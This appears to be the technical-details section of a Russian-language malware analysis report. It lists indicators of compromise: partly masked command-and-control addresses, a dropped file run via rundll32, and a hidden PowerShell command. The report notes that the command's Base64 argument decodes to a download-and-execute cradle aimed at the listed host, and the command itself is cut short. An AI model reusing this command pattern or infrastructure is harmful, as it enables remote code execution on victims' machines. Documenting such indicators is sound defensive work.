Техническая информация
- http://46.#.19.136/boogyman.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\gah.bin
- '46.#.19.136':80
- '10#.#45.146.219':80
- '74.##.157.139':443
- '20#.#38.26.60':443
- 'microsoft.com':80
- '15#.#8.23.192':443
- '20#.#38.26.60':443
- DNS ASK microsoft.com
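- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном; видимая часть аргумента -enc — это Base64 от строки в UTF-16LE, она декодируется как IEX (New-Object Net.Webclient).downloadstring("http://46… — то есть загрузка и выполнение скрипта, по-видимому, с адреса 46.#.19.136, указанного выше; остальная часть команды в отчёте обрезана)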
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\GAh.bin StartW
- '<SYSTEM32>\wermgr.exe'